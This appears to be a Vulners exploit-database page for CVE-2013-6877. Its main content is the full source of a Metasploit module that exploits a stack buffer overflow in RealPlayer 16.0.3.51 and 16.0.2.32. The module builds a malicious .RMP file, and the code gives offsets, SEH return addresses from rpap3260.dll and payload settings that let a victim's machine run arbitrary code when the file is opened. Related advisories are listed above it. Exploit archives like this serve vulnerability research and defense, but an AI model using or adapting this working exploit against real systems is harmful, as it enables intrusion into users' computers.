Vulners
Lucene search
RealNetworks RealPlayer Version Attribute Buffer Overflow
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | RealPlayer Heap-based Buffer Overflow Vulnerability | 19 Dec 201300:00 | – | zdt |
| RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - (.rmp) Version Attribute Buffer Overflow | 24 Dec 201300:00 | – | zdt |
 | CVE-2013-6877 | 24 Dec 201300:00 | – | circl |
 | RealPlayer Heap-based Buffer Overflow Vulnerability | 17 Dec 201300:00 | – | coresecurity |
 | RealNetworks RealPlayer RMP File Heap Buffer Overflow (CVE-2013-6877) | 13 Jan 201400:00 | – | checkpoint_advisories |
| RealNetworks RealPlayer RMP File Stack Buffer Overflow (CVE-2013-6877) | 16 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2013-6877 | 19 Dec 201322:00 | – | cve |
 | CVE-2013-6877 | 19 Dec 201322:00 | – | cvelist |
 | CVE-2013-6877 | 19 Dec 201322:55 | – | nvd |
 | RealNetworks RealPlayer Buffer Overflow Vulnerability (Dec 2013) - Windows | 26 Dec 201300:00 | – | openvas |
10
`##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
improper bounds checking of the version and encoding attributes inside
the XML declaration.
By persuading the victim to open a specially-crafted .RMP file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6877' ],
[ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'seh'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x22",
'Space' => 532,
},
'Targets' =>
[
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
{
'OffsetClick' => 2540, # Open via double click
'OffsetMenu' => 13600, # Open via File -> Open
'Ret' => 0x641930C8 # POP POP RET from rpap3260.dll
}
],
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
{
'OffsetClick' => 2540, # Open via double click
'OffsetMenu' => 13600, # Open via File -> Open
'Ret' => 0x63A630B8 # POP POP RET from rpap3260.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 20 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
],
self.class)
end
def exploit
sploit = rand_text_alpha_upper(target['OffsetClick'])
sploit << generate_seh_payload(target.ret)
sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
sploit << generate_seh_payload(target.ret)
sploit << rand_text_alpha_upper(17000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create("<?xml version=\"" + sploit + "\"?>")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2013 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.34977